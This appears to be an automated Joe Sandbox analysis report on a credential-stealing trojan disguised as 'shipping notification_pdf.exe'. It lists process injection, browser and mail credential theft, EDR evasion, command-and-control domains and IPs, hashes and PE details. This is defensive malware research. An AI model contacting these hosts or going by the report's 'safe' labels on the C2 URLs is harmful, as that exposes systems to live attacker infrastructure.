            Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix (techniques listed per tactic; figures in parentheses are the counts given in the report)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
            Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Privilege Escalation: Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
            Defense Evasion: Virtualization/Sandbox Evasion (2); Process Injection (412); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1)
            Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
            Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
            Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture
            Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
            Behavior Graph (ID: 1520196; Sample: shipping notification_pdf.exe; Startdate: 27/09/2024; Architecture: WINDOWS; Score: 100)

            Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures. Contacted: www.softillery.info, www.consultarfacil.online and 12 other IPs or domains.

            • shipping notification_pdf.exe (started): Writes to foreign memory regions; Maps a DLL or memory area into another process; starts svchost.exe
            • svchost.exe: Maps a DLL or memory area into another process; injects into AVyNLNHPrma.exe
            • AVyNLNHPrma.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); starts sort.exe
            • sort.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures; injects into AVyNLNHPrma.exe; starts firefox.exe
            • AVyNLNHPrma.exe (injected by sort.exe): Found direct / indirect Syscall (likely to bypass EDR); contacts www.priunit.online (162.0.238.238, ports 54973, 54974, 54975; NAMECHEAP-NETUS, Canada), www.nmh6.site (43.154.104.247, ports 54957, 54958, 54959; LILLY-ASUS, Japan) and 5 other IPs or domains
            • firefox.exe (started by sort.exe)

            Source | Detection | Scanner | Label
            shipping notification_pdf.exe | 32% | ReversingLabs | Win32.Trojan.Generic
            shipping notification_pdf.exe | 100% | Avira | HEUR/AGEN.1321671
            shipping notification_pdf.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.priunit.online/orig/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.consultarfacil.online/f1ix/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.nmh6.site/aqh8/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sapatarias.online/3632/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.nmh6.site/aqh8/?3h-p=5+U/B9yLCC3fujBRlYTV20I98PveYGmvCXYzu/ftmHOnFysm+UcobObnCUFXWy45RBneaC03tE6NiMazv36XsdX71yQuORGTyAJPqKJQT0rpdkIxSLnsafg/tkq0RYEKr7ZU9FsrwT/u&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sapatarias.online/3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.softillery.info/05bk/?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0false
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabsort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://dts.gnpge.comfirefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/ac/?q=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icosort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.ecosia.org/newtab/sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://ac.ecosia.org/autocomplete?q=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.antura.partners/sk-logabpstatus.php?a=K3ZvUk8rMHZ6cWJBTjJIV04zS2R2RnBlczJZWldicnJFSmlpMmpsort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.exhibitarrange.shopAVyNLNHPrma.exe, 0000000C.00000002.3146774474.0000000005370000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.antura.partners/px.js?ch=1sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.antura.partners/px.js?ch=2sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.sapatarias.online | United States | 16509 | AMAZON-02US | false
208.91.197.27 | www.antura.partners | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | false
43.154.104.247 | www.nmh6.site | Japan | 4249 | LILLY-ASUS | false
38.180.87.102 | www.skystargazeguide.store | United States | 174 | COGENT-174US | false
3.33.130.190 | softillery.info | United States | 8987 | AMAZONEXPANSIONGB | false
162.0.238.238 | www.priunit.online | Canada | 22612 | NAMECHEAP-NETUS | false
34.76.205.124 | www.exhibitarrange.shop | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520196
Start date and time: 2024-09-27 06:33:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: shipping notification_pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@11/7
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 39
• Number of non-executed functions: 316
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• VT rate limit hit for: shipping notification_pdf.exe
Time | Type | Description
01:53:16 | API Interceptor | 5467288x Sleep call for process: sort.exe modified
Process: C:\Windows\SysWOW64\sort.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\shipping notification_pdf.exe
File Type: data
Category: modified
Size (bytes): 286720
Entropy (8bit): 7.993140420185179
Encrypted: true
SSDEEP: 6144:JnC1QgqO9zH1kU2eBp0ISQX6K3PSGYWeVw:JnCHOVbINq6hYWAw
MD5: E81BD67B42F31548356F2E23FA82E1C4
SHA1: 71CA0479ED0C05F0A8931FB9750A95D54DB4EDB0
SHA-256: CE199A4E302B7F4A8F12F7A2A8065B8ADCB8EC74F6DD354BFAD2A72D0C8C9E1D
SHA-512: 7FF55044CE78C8FFC40B66658349C99936D9A96973371C0CD3D65B1832D238950F72A045D6578DB68835AF962BE1213067E4C371CC3ED229466519F53DD0A3D1
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.540601924791697
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: shipping notification_pdf.exe
File size: 1'359'839 bytes
MD5: d9e239c79f89ec481ec939d7f784c89e
SHA1: 9b83acaa385abba92e8d3566479578af4fcdd954
SHA256: 0ef342eee9167ec78306dabdd82b0c41f34f1e3ed7d35676a602735497d72101
SHA512: c20de20a26b45db12e307f0d78111457a89f86dd0886f8d18105a684872632b00f675da366e8e9625cd6c5107352e9c2c5707f8d572c5c065eb21b9e38700209
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaCw0rBo3y2A8NTNeSWvqVSFAit6xSnAU:7JZoQrbTFZY1iaCw0ypTNcNSvit6ql
TLSH: 4255F222F5D68076C1B323B19E7EF7AA963D79360326D29B37C81D211E605416B3A733
                                        Icon Hash:1733312925935517
                                        Entrypoint:0x4165c1
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:0
                                        File Version Major:5
                                        File Version Minor:0
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:0
                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                        Instruction
                                        call 00007F6EB87CFB6Bh
                                        jmp 00007F6EB87C69DEh
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        push edi
                                        push esi
                                        mov esi, dword ptr [ebp+0Ch]
                                        mov ecx, dword ptr [ebp+10h]
                                        mov edi, dword ptr [ebp+08h]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F6EB87C6B5Ah
                                        cmp edi, eax
                                        jc 00007F6EB87C6CF6h
                                        cmp ecx, 00000080h
                                        jc 00007F6EB87C6B6Eh
                                        cmp dword ptr [004A9724h], 00000000h
                                        je 00007F6EB87C6B65h
                                        push edi
                                        push esi
                                        and edi, 0Fh
                                        and esi, 0Fh
                                        cmp edi, esi
                                        pop esi
                                        pop edi
                                        jne 00007F6EB87C6B57h
                                        jmp 00007F6EB87C6F32h
                                        test edi, 00000003h
                                        jne 00007F6EB87C6B66h
                                        shr ecx, 02h
                                        and edx, 03h
                                        cmp ecx, 08h
                                        jc 00007F6EB87C6B7Bh
                                        rep movsd
                                        jmp dword ptr [00416740h+edx*4]
                                        mov eax, edi
                                        mov edx, 00000003h
                                        sub ecx, 04h
                                        jc 00007F6EB87C6B5Eh
                                        and eax, 03h
                                        add ecx, eax
                                        jmp dword ptr [00416654h+eax*4]
                                        jmp dword ptr [00416750h+ecx*4]
                                        nop
                                        jmp dword ptr [004166D4h+ecx*4]
                                        nop
                                        inc cx
                                        add byte ptr [eax-4BFFBE9Ah], dl
                                        inc cx
                                        add byte ptr [ebx], ah
                                        ror dword ptr [edx-75F877FAh], 1
                                        inc esi
                                        add dword ptr [eax+468A0147h], ecx
                                        add al, cl
                                        jmp 00007F6EBAC3F357h
                                        add esi, 03h
                                        add edi, 03h
                                        cmp ecx, 08h
                                        jc 00007F6EB87C6B1Eh
                                        rep movsd
                                        jmp dword ptr [00000000h+edx*4]
                                        Programming Language:
                                        • [ C ] VS2010 SP1 build 40219
                                        • [C++] VS2010 SP1 build 40219
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2010 SP1 build 40219
                                        • [RES] VS2010 SP1 build 40219
                                        • [LNK] VS2010 SP1 build 40219
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                        RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                        RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                        RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
                                        RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
                                        RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
                                        RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
                                        RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
                                        RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
                                        RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
                                        RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
                                        RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
                                        RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
                                        RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
                                        RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
                                        RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
                                        RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
                                        RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                        RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                        RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
                                        RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
                                        RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
                                        RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
                                        RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
                                        RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
                                        RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
                                        RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                                        DLL | Import
                                        WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                        VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                        WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                        COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                        MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                        WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                        PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                        USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                        KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                        USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, 